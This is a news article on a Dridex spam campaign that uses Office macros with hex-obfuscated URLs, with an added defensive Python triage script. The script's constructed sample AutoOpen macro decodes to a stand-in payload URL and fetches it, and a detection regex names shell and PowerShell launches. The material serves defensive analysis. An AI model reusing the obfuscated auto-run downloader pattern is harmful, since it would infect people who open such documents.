Dridex Banking Malware Abuses Microsoft Office Macros to Infect Users

The attacks, largely against users in the United Kingdom, are leveraging macros in Microsoft Office documents to infect users.

Dridex banking malware

The Dridex banking malware is being used in a malicious spam campaign that is generating 15,000 emails a day, according to security firm Trustwave. The attacks, largely against users in the United Kingdom, are leveraging macros in Microsoft Office documents to infect users.

The attack works as follows: a user receives a malicious Office document containing a macro that, once run, triggers a download of the Dridex banking malware. Dridex steals the user's banking credentials and attempts to generate fraudulent financial transactions.

Trustwave has not yet identified the group behind the new Dridex attack.

"We have been tracking the spambot behind it, and it is notorious for sending other malicious spam attacks that lead to Trojan Downloader infections and exploit kits," Rodel Mendrez, a security researcher at Trustwave, told eWEEK. "We have not given the campaign a name."

While there was a peak of almost 15,000 malicious macro document spam messages sent per day, the actual number of user infections is difficult to determine with certainty, Mendrez said.

"It is hard to tell the number of infections because the payload malware must be triggered by opening and enabling the macro in Office," Mendrez explained.

Trustwave maintains spam traps that act like mail servers, and the Trustwave Secure Email Gateway is able to detect the spam. Mendrez added that the potential victims are most likely customers or anyone who deals with the businesses that the cyber-criminals are mimicking.

The Dridex campaign is leveraging a macro function known as "AutoOpen()" that can be triggered as soon as a document file is opened. The actual Website location and the malware that the macro retrieves are hidden by the attackers using what Trustwave refers to as a "text-to-hexadecimal" obfuscation, in which the characters are converted into hexadecimal strings; for example, "http:" is converted to "687474703A."
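As an added illustration of how an analyst can unpick that "text-to-hexadecimal" trick (example code written for this article, not Trustwave's tooling or anything from the campaign itself): the routine below scans macro source for quoted hex-string literals, decodes them, and flags an AutoOpen macro whose decoded strings contain a URL or an executable name. The macro text and the URL in it are constructed placeholders.

```python
import re
from typing import Dict, List

# Constructed sample macro, not taken from the campaign: the download location
# is stored as a hex string in the style the article describes ("http:" -> "687474703A").
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim s As String
    s = "687474703A2F2F6578616D706C652E696E76616C69642F7061796C6F61642E657865"
    Call Fetch(Decode(s))
End Sub
'''

# A quoted run of at least four hex byte pairs; short literals are ignored to cut noise.
HEX_LITERAL = re.compile(r'"((?:[0-9A-Fa-f]{2}){4,})"')
# Decoded content worth a second look: URLs, executables, or a shell/PowerShell launch.
SUSPICIOUS = re.compile(r'(https?://|\.exe\b|\.dll\b|cmd\.exe|powershell)', re.I)


def decode_hex_literals(macro_source: str) -> List[Dict[str, object]]:
    """Find quoted hex strings in VBA source and decode them to ASCII text.
    Returns one record per literal that decodes to printable text."""
    findings: List[Dict[str, object]] = []
    for match in HEX_LITERAL.finditer(macro_source):
        raw = match.group(1)
        try:
            text = bytes.fromhex(raw).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not a text payload; skip binary-looking literals
        if not text.isprintable():
            continue
        findings.append({"hex": raw, "decoded": text,
                         "suspicious": bool(SUSPICIOUS.search(text))})
    return findings


def triage(macro_source: str) -> Dict[str, object]:
    """Combine the two indicators the article describes: an AutoOpen entry point
    plus a hex-obfuscated string that decodes to a URL or executable."""
    has_autoopen = re.search(r"\bSub\s+AutoOpen\s*\(", macro_source, re.I) is not None
    findings = decode_hex_literals(macro_source)
    hit = has_autoopen and any(f["suspicious"] for f in findings)
    return {"auto_open": has_autoopen, "findings": findings,
            "verdict": "suspicious" if hit else "benign"}
```

Run against an extracted macro (for instance the VBA source pulled out of a document by a macro-extraction tool), the decoded strings give a triage analyst the download location without executing anything.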

The use of a document macro to deliver malware is an old idea in computer security that has seen a revival in the last year. Back in 1999 and 2000, macro viruses, including the ILOVEYOU and Melissa viruses, infected millions of users. Microsoft took steps in 2007 to limit the ability of macros in Microsoft Office, but attackers in 2014 still found ways to exploit users by way of macros. Multiple security vendors, including Sophos and Cisco, reported an increase in macro viruses in 2014.

Macros are disabled by default in Microsoft Office, and when a macro is present in the document, users are notified by the software before anything is loaded, Mendrez explained. The group behind the malicious Dridex spam campaign is using social engineering tactics in hopes that a small number of people will open the malicious document and enable the macro manually.

While up-to-date antivirus software is always a good idea, attackers are constantly modifying malware to make it undetectable.

"The best protection for this is to avoid opening email attachments and disable the macro feature in Microsoft Office," Mendrez said. "I believe the group behind the attack will still continue to use macros as an infection vector in 2015."

Sean Michael Kerner is a senior editor at eWEEK and InternetNews.com. Follow him on Twitter @TechJournalist.

Sean Michael Kerner is an Internet consultant, strategist, and contributor to several leading IT business web sites.